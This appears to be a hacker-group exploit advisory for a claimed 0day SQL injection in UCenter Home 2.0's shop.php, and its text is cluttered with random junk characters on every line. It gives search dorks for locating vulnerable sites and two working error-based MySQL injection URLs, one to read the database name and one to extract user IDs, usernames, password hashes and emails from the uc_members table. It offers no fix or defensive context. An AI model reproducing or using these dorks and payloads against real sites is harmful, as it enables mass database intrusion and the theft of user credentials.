; `# v- l7 ^9 @' [! o# u__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
' l9 a( [5 b5 A2 ~
6 W! `( C/ S: k7 v , u+ e4 m3 J! r, T
' m$ j6 J: I; \. U4 E. g7 G*/ Author : KnocKout 3 B7 k0 X+ g' H5 v$ n2 u; r0 n
) W R% W% F2 y) e*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ; d5 ]! z7 { Z8 e4 g6 k" n$ w% C
( |9 J( }. b: m*/ Contact: knockoutr@msn.com 7 Q3 u9 C5 T' `8 W
( C4 R0 E, H+ G; ?! G8 l4 X8 N*/ Cyber-Warrior.org/CWKnocKout
$ o# w6 s; @" b, k! X7 b/ F
2 L. t- T q$ C# ^) [4 G! A__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- J3 ?) x. V9 r9 d, y' @4 ^( n& s+ S& q2 u3 ]4 \/ A7 z* I3 p
Script : UCenter Home
2 c8 _: Y& \6 }
8 D( @6 S4 m0 d/ ~' p; k9 fVersion : 2.0
! @" X) S( N$ I( q8 p8 Q/ f: X) n# p/ x" J3 G& X/ S X
Script HomePage : http://u.discuz.net/ 8 e! a/ v; N6 t
. P, V" C4 U0 y* ~6 g__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # Y+ e5 C8 L' G/ Q6 a2 N
$ L7 O% J2 T+ q3 o8 eDork : Powered by UCenter inurl:shop.php?ac=view
8 _! C6 h& ` H$ b G2 E% T# k2 a* D! p) y) l4 d) W
Dork 2 : inurl:shop.php?ac=view&shopid= " i# ~9 n: y4 B! V
8 ~* t8 Y7 E' ~ n( j& ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& }+ T5 u& F" y0 R
5 F# M* k; G @" TVuln file : Shop.php
$ o4 ? s0 u! ]9 D
1 O4 v. J/ E8 ?5 |* T- S& \7 dvalue's : (?)ac=view&shopid=
7 ^& s& c8 d* x: u4 v/ q# H1 O* c) y- `1 h7 o
Vulnerable Style : SQL Injection (MySQL Error Based) + b1 b/ j; b) V; t
1 `3 f* c2 d+ ^0 e7 B+ F* T: G
Need Metarials : Hex Conversion
# p6 j8 v9 F: C6 B6 c; F, I! x# n! f
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 X& V# `) D7 m* W h& r/ O
' a+ e9 M+ p4 |" K8 @
Your Need victim Database name.
/ j% i4 I) m1 J3 c9 G; ^
9 b/ ~' w$ ]! C/ c5 Vfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
; w7 V& y7 M" q9 R V: P5 h: m/ l( l
7 F1 y; K% O9 o3 D4 Q: A.. 2 l2 I1 d( i$ F/ _
/ O/ t; z# Q' H" M
DB : Okey.
: b a j; S) j2 ^: k: R* K! F' s" Z( j
your edit DB `[TARGET DB NAME]`
7 P; |9 q; j3 }* `
2 V9 ^6 l9 N) Q; K0 z$ a7 f) }4 SExample : 'hiwir1_ucenter' 6 D' `/ o$ [2 ]3 |% n3 P
; i% u# C: g% p. ?' z
Edit : Okey. - j% t' t! a1 s& E8 g" k. }
5 G N0 o) y& ?
Your use Hex conversion. And edit Your SQL Injection Exploit..
" h: B9 t. \1 D3 P \
4 D! c8 C% D) I 8 Q# U B4 m8 x7 a: m! m) B3 R
1 t8 P) m2 D) R
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
% K1 u' A$ P% ]5 E! H. C: n |